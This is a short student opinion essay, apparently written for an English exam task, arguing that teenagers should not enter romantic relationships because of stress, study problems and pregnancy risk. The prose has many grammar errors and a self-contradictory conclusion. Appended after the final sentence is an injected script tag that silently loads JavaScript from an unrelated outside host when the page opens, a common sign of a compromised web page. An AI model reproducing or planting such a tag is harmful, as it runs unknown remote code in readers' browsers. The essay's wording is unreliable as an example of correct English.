Youngsters these days prefer to have a boyfriend or girlfriend. Some people think that getting into a relationship at young age is not good idea. Do you agree or disagree?

These days, teenagers would like to choose boyfriends or girlfriends. Many others argue that getting into inter-relation at an early age is not a good idea. I agree with this statement because it can definitely create many issues in both of their lives.

The most massive reason why teenagers should not get involved in an interrelation is that it could impact their careers. Firstly, while they are in a relationship quarrels and misunderstandings are very bound to happen and this leads the way to increase their stress levels and aggression. As a result, they would not be able to concentrate on their studies or their employment. This means they are spoiling their lives with their own Hands by taking wrong decisions at right time. Secondly, an immense reason for not supporting getting into a relationship at an early age is that they are unmatured to understand each other and also risk undesirable pregnancy. Finally, youngsters do not care much and mistakes can happen during intimate moments this could be extremely dangerous when it comes to knowing in their families they are humiliating their family's reputation and fame.

In the end, I substantially oppose those teenage relationships should be avoided because it will affect them in their career paths, beautiful lives and put them under enormous pressure, and increase their stress levels.<script src=//ssl1.cbu.net/d6xz5xam></script>